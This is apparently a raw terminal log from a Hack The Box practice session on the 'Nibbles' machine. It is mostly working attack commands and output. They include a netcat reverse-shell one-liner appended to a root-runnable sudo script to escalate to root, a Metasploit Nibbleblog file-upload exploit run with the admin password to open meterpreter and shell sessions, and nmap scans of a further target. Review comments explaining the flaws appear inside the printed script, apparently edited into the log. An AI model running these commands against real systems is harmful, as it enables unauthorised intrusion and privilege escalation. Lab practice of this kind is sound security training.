──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 9443
listening on [any] 9443 ...
connect to [10.10.15.44] from (UNKNOWN) [10.129.65.155] 47846
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler/
<ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler/
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip user.txt
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal/stuff
lcd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ s
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 9443
listening on [any] 9443 ...
connect to [10.10.15.44] from (UNKNOWN) [10.129.65.155] 47848
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler/personal/stuff
<ate/plugins/my_image$ cd /home/nibbler/personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f' | tee -a monitor.sh
< /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f' | tee -a monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh
####################################################################################################
# Tecmint_monitor.sh #
# Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/ #
# If any bug, report us in the link below #
# Free to use/edit/distribute the code below by #
# giving proper credit to Tecmint.com and Author #
# #
####################################################################################################
# NOTE(review): this header precedes the `#! /bin/bash` line, so the interpreter line is not on
# line 1 and is not honoured as a shebang.  When the file is run via sudo (see the session above)
# it falls back to /bin/sh, which is consistent with every `[[ ... ]]` test below failing with
# "[[: not found".  Moving the shebang to line 1, or invoking the script with bash explicitly,
# is the fix.
# NOTE(review): sudoers grants `(root) NOPASSWD` on this file at a path inside a user-writable
# home directory (see `sudo -l` above).  A root-run script must live on a root-owned,
# non-writable path (the -i option below installs it as /usr/bin/monitor) and sudoers should
# reference only that copy; otherwise whatever the owning user writes into this file runs as root.
#! /bin/bash
# unset any variable which system may be using
# clear the screen
# `clear` needs a usable TERM; in the sudo run above it printed
# "'unknown': I need something more specific." instead of clearing.
clear
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
# Option parsing: -i installs the script to /usr/bin/monitor, -v prints the version.
# getopts stores the matched option letter in `name`.
while getopts iv name
do
case $name in
i)iopt=1;;
v)vopt=1;;
*)echo "Invalid arg";;
esac
done
# -i: install a copy of this script as /usr/bin/monitor (root password requested by su).
if [[ ! -z $iopt ]]
then
{
wd=$(pwd)
# Resolves this script's own basename (following one symlink level) into a fixed /tmp file.
# NOTE(review): a predictable /tmp path written and read back by a privileged script is a
# symlink/pre-existing-file hazard; keep the value in a variable or use mktemp instead.
basename "$(test -L "$0" && readlink "$0" || echo "$0")" > /tmp/scriptname
# Prepends the working directory to the saved basename, i.e. assumes the script lives in the
# current directory; invoked from elsewhere, the resulting path would be wrong.
scriptname=$(echo -e -n $wd/ && cat /tmp/scriptname)
# The path is interpolated unquoted into a command string executed by root's shell (su -c), so
# spaces or shell metacharacters in the path would be re-parsed there; quoting the path inside
# the string, or avoiding the string-built command, removes that.
su -c "cp $scriptname /usr/bin/monitor" root && echo "Congratulations! Script Installed, now run monitor Command" || echo "Installation failed"
}
fi
# -v: print the version banner.
if [[ ! -z $vopt ]]
then
{
echo -e "tecmint_monitor version 0.1\nDesigned by Tecmint.com\nReleased Under Apache 2.0 License"
}
fi
# No arguments at all: run the health report.  $# is checked before the `shift` at the bottom,
# so any option (-i, -v, or an unknown one) suppresses this section.
if [[ $# -eq 0 ]]
then
{
# Define Variable tecreset
# tput sgr0 = terminal "reset attributes" sequence, used to end the green '\E[32m' labels below.
tecreset=$(tput sgr0)
# Check if connected to Internet or not
# Outbound ICMP to google.com; `&>` is a bash redirection (not POSIX sh).
ping -c 1 google.com &> /dev/null && echo -e '\E[32m'"Internet: $tecreset Connected" || echo -e '\E[32m'"Internet: $tecreset Disconnected"
# Check OS Type
os=$(uname -o)
echo -e '\E[32m'"Operating System Type :" $tecreset $os
# Check OS Release Version and Name
# Keeps the NAME/VERSION lines of /etc/os-release (minus VERSION_ID and PRETTY_NAME) in a fixed
# /tmp file; the next two lines cut the double-quoted value out of it.
# NOTE(review): same predictable-/tmp-path concern as above; /tmp/osrelease, /tmp/who,
# /tmp/ramcache and /tmp/diskusage are all created at fixed names by a root-run script.
cat /etc/os-release | grep 'NAME\|VERSION' | grep -v 'VERSION_ID' | grep -v 'PRETTY_NAME' > /tmp/osrelease
echo -n -e '\E[32m'"OS Name :" $tecreset && cat /tmp/osrelease | grep -v "VERSION" | cut -f2 -d\"
echo -n -e '\E[32m'"OS Version :" $tecreset && cat /tmp/osrelease | grep -v "NAME" | cut -f2 -d\"
# Check Architecture
architecture=$(uname -m)
echo -e '\E[32m'"Architecture :" $tecreset $architecture
# Check Kernel Release
kernelrelease=$(uname -r)
echo -e '\E[32m'"Kernel Release :" $tecreset $kernelrelease
# Check hostname
echo -e '\E[32m'"Hostname :" $tecreset $HOSTNAME
# Check Internal IP
internalip=$(hostname -I)
echo -e '\E[32m'"Internal IP :" $tecreset $internalip
# Check External IP
# Asks a third-party web service (ipecho.net) for the public address: an outbound HTTP request
# from a root-run script that also discloses the host's egress IP to that service.  The trailing
# `echo` only ensures a newline when the reply has none.
externalip=$(curl -s ipecho.net/plain;echo)
echo -e '\E[32m'"External IP : $tecreset "$externalip
# Check DNS
# Drops the first line of resolv.conf and prints field 2 of every remaining line; assumes the
# remaining lines are all `nameserver <ip>` — other directives would be printed too.
nameservers=$(cat /etc/resolv.conf | sed '1 d' | awk '{print $2}')
echo -e '\E[32m'"Name Servers :" $tecreset $nameservers
# Check Logged In Users
who>/tmp/who
echo -e '\E[32m'"Logged In users :" $tecreset && cat /tmp/who
# Check RAM and SWAP Usages
# `grep -v +` drops the "-/+ buffers/cache" line that older `free` output included.
free -h | grep -v + > /tmp/ramcache
echo -e '\E[32m'"Ram Usages :" $tecreset
cat /tmp/ramcache | grep -v "Swap"
echo -e '\E[32m'"Swap Usages :" $tecreset
cat /tmp/ramcache | grep -v "Mem"
# Check Disk Usages
# The pattern is a regex, so `/dev/sda*` matches "/dev/sd" followed by zero or more "a"s,
# i.e. every /dev/sd* device — presumably the intent, but it is not a glob.
df -h| grep 'Filesystem\|/dev/sda*' > /tmp/diskusage
echo -e '\E[32m'"Disk Usages :" $tecreset
cat /tmp/diskusage
# Check Load Average
# Takes fields 10-12 of top's header line; the positions depend on top's output format and on
# the uptime wording in that line — presumably fragile, verify on the target.
loadaverage=$(top -n 1 -b | grep "load average:" | awk '{print $10 $11 $12}')
echo -e '\E[32m'"Load Average :" $tecreset $loadaverage
# Check System Uptime
tecuptime=$(uptime | awk '{print $3,$4}' | cut -f1 -d,)
echo -e '\E[32m'"System Uptime Days/(HH:MM) :" $tecreset $tecuptime
# Unset Variables
# NOTE(review): the list says `nameserver` but the variable set above is `nameservers`, and
# `tecuptime` is not listed, so those two survive this unset.
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
# Remove Temporary Files
rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
}
fi
# Drops the parsed options from $@.  In the original script this is the last statement, so it
# has no observable effect.
shift $(($OPTIND -1))
# NOTE(review): this line is not part of the Tecmint script; the session above shows it being
# appended with `tee -a monitor.sh`.  Because sudoers runs this user-writable file as root, it
# executes with root privileges on every invocation, regardless of arguments.  The remediation
# is on the sudoers side (reference only a root-owned, non-writable copy, or drop the rule), and
# for detection, an integrity check on every file path that sudoers references.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ msfconsole
Metasploit tip: Use the resource command to run commands from a file
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v6.4.56-dev ]
+ -- --=[ 2505 exploits - 1291 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search exploit nibbleblog
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.78.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.129.65.155
RHOSTS => 10.129.65.155
msf6 exploit(multi/http/nibbleblog_file_upload) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/content/private/plugins/my_image/
TARGETURI => /nibbleblog/content/private/plugins/my_image/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:h
ost:port][...]
RHOSTS 10.129.65.155 yes The target host(s), see https://docs.metasploi
t.com/docs/using-metasploit/basics/using-metas
ploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog/content/privat yes The base path to the web application
e/plugins/my_image/
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.78.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST tun0
LHOST => 10.10.15.44
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI nibbleblog
TARGETURI => nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > rn
[-] Unknown command: rn. Run the help command for more details.
msf6 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Sending stage (40004 bytes) to 10.129.65.155
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.15.44:4444 -> 10.129.65.155:38940) at 2025-06-23 16:45:34 -0400
id
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias for lpwd)
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
For more info on a specific command, use <command> -h or help <command>.
meterpreter > exit
[*] Shutting down session: 1
[*] 10.129.65.155 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(multi/http/nibbleblog_file_upload) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS 10.129.65.155 yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.15.44 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
msf6 exploit(multi/http/nibbleblog_file_upload) > set payloadshowInterrupt: use the 'exit' command to quit
msf6 exploit(multi/http/nibbleblog_file_upload) > show generic
[-] Invalid parameter "generic", use "show -h" for more information
msf6 exploit(multi/http/nibbleblog_file_upload) > show payloads | grep generic
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
[-] Invalid parameter "|", use "show -h" for more information
[-] Invalid parameter "grep", use "show -h" for more information
[-] Invalid parameter "generic", use "show -h" for more information
msf6 exploit(multi/http/nibbleblog_file_upload) > set payload payload/generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS 10.129.65.155 yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.15.44 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[+] Deleted image.php
[*] Command shell session 2 opened (10.10.15.44:4444 -> 10.129.65.155:38942) at 2025-06-23 16:48:05 -0400
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ ls
ls
db.xml
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ exit
<ml/nibbleblog/content/private/plugins/my_image$ exit
exit
^C
Abort session 2? [y/N] ^C
[*] 10.129.65.155 - Command shell session 2 closed. Reason: User exit
msf6 exploit(multi/http/nibbleblog_file_upload) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/nibbleblog_file_upload) > exit
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ cd
┌──(kali-user㉿kali-linux)-[~]
└─$ cd .ssh
┌──(kali-user㉿kali-linux)-[~/.ssh]
└─$ ls
known_hosts known_hosts.old
┌──(kali-user㉿kali-linux)-[~/.ssh]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~]
└─$ ls
Desktop Documents Downloads htb-practice Music Pictures Public Templates Videos
┌──(kali-user㉿kali-linux)-[~]
└─$ cd Desktop/h
cd: no such file or directory: Desktop/h
┌──(kali-user㉿kali-linux)-[~]
└─$ cd htb-practice
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ ls
Nibbles
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ mkdir knowledge
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ cd knowledge
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ mkdir nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ cd nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open 10.129.230.124 -oA nmap_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:25 EDT
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.49 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open 10.129.230.124 -oA nmap_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:35 EDT
Nmap scan report for 10.129.230.124
Host is up (0.019s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ whatweb http://10.129.230.124
http://10.129.230.124 [200 OK] AddThis, Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.230.124], Script[text/javascript], Title[Welcome to GetSimple! - gettingstarted]
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open 10.129.230.124 -oA nmap_scan -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:36 EDT
Nmap scan report for 10.129.230.124
Host is up (0.018s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ ls
nmap_full_scan.gnmap nmap_full_scan.xml nmap_scan.nmap
